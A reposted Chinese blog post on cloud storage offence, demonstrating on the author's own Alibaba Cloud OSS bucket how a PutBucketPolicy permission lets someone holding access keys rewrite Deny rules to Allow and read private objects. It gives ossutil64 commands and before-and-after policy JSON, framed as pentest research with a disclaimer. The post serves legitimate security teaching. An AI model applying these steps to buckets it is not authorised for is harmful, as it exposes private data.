文章总结： 本文介绍了云存储OSS的安全攻防技术，重点讲解如何利用PutBucketPolicy权限来获取私有存储桶的访问权限。当渗透测试中发现桶ACL为私有但可写时，攻击者可以通过修改存储桶策略，将原本拒绝访问的权限更改为允许访问，从而获取存储桶中的敏感数据。文章提供了详细的操作步骤和命令示例，展示了从查看策略到修改策略再到获取数据的完整攻击流程。这种攻击方法特别适用于已获取AK/SK但缺乏ListBucket/GetObject权限的场景，为云安全防护提供了重要参考。 综合评分： 91 文章分类： 云安全,渗透测试,漏洞分析,实战经验,数据安全

云存储攻防之PutBucketPolicy

原创

Al1ex

七芒星实验室

2023年7月24日 17:05 四川

文章前言

如果我们在渗透测试中发现一个OSS，而且默认无法进行读取数据(即桶ACL为”私有”)，但是通过查询ACL我们发现桶ACL可写，那么此时我们就可以通过写ACL来更新桶ACL并获取到对象数据信息

演示流程

Step 1：进入OSS控制面板，选择”查看Bucket列表”

Step 2：进入Bucket操作界面

Step 3：进入”权限管理”页面，确定当前”Bucket ACL”为”私有”

Step 4：设置存储桶策略允许”PutBucketPolicy”和GetBucketPolicy

Step 5：设置存储桶策略拒绝”ListObject”和”GetObject”

最终配置策略如下：

利用演示

Step 1：直接访问存储桶域名可以看到无法列对象，同时提示”Access denied by bucket policy”

Step 2：之后查看Policy

ossutil64.exe bucket-policy oss://al1ex --method get -c D:\Application\ossutil64\.ossutilconfig

{    "Version": "1",    "Statement": [        {            "Principal": [                "*"            ],            "Effect": "Deny",            "Resource": [                "acs:oss:*:1042964876806166:al1ex/*"            ],            "Action": [                "oss:ListObjects",                "oss:GetObject"            ]        },        {            "Principal": [                "*"            ],            "Effect": "Deny",            "Resource": [                "acs:oss:*:1042964876806166:al1ex"            ],            "Condition": {                "StringLike": {                    "oss:Prefix": [                        "*"                    ]                }            },            "Action": [                "oss:ListObjects",                "oss:GetObject"            ]        },        {            "Principal": [                "*"            ],            "Effect": "Allow",            "Resource": [                "acs:oss:*:1042964876806166:al1ex/*"            ],            "Action": [                "oss:PutBucketPolicy",                "oss:GetBucketPolicy"            ]        }    ]}

Step 3：之后我可以将Effect中的”Deny”更改为Allow即可，构造一下json文件

{    "Version": "1",    "Statement": [        {            "Principal": [                "*"            ],            "Effect": "Allow",            "Resource": [                "acs:oss:*:1042964876806166:al1ex/*"            ],            "Action": [                "oss:ListObjects",                "oss:GetObject"            ]        },        {            "Principal": [                "*"            ],            "Effect": "Allow",            "Resource": [                "acs:oss:*:1042964876806166:al1ex/*"            ],            "Action": [                "oss:PutBucketPolicy",                "oss:GetBucketPolicy"            ]        }    ]}

之后上传更新存储桶策略

ossutil64.exe bucket-policy oss://al1ex --method put   D:\Application\ossutil64\change.json -c D:\Application\ossutil64\.ossutilconfig

Step 4：再次查看策略会发现成功更新

Step 5：直接访问存储桶域名信息发现无法列举对象(很是奇怪)

但是想着可以访问对象了：

Step 6：查看存储桶读写权限可以看到已经变成了”公共读”

Step 7：查看存储桶可以看到”拒绝”变为了”Allow”

文末小结

本篇文章我们介绍了当Bucket授权策略配置了PutBucketPolicy，且在获取到AK/SK的情况下如何更改Bucket授权策略，获取对象信息，有些人可能会想，如果获取到了AK/SK，直接使用OSS Browser链接不就可以了吗？但是如果没有ListBucket/GetObject，那么此时是无法连接的，而这个时候我们可以去查看是否可获取Policy，如果可以获取到策略且有配置PutBucketPolicy，那么就可以更新Policy，并最终获得存储桶的访问权限

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：七芒星实验室 Al1ex《云存储攻防之PutBucketPolicy》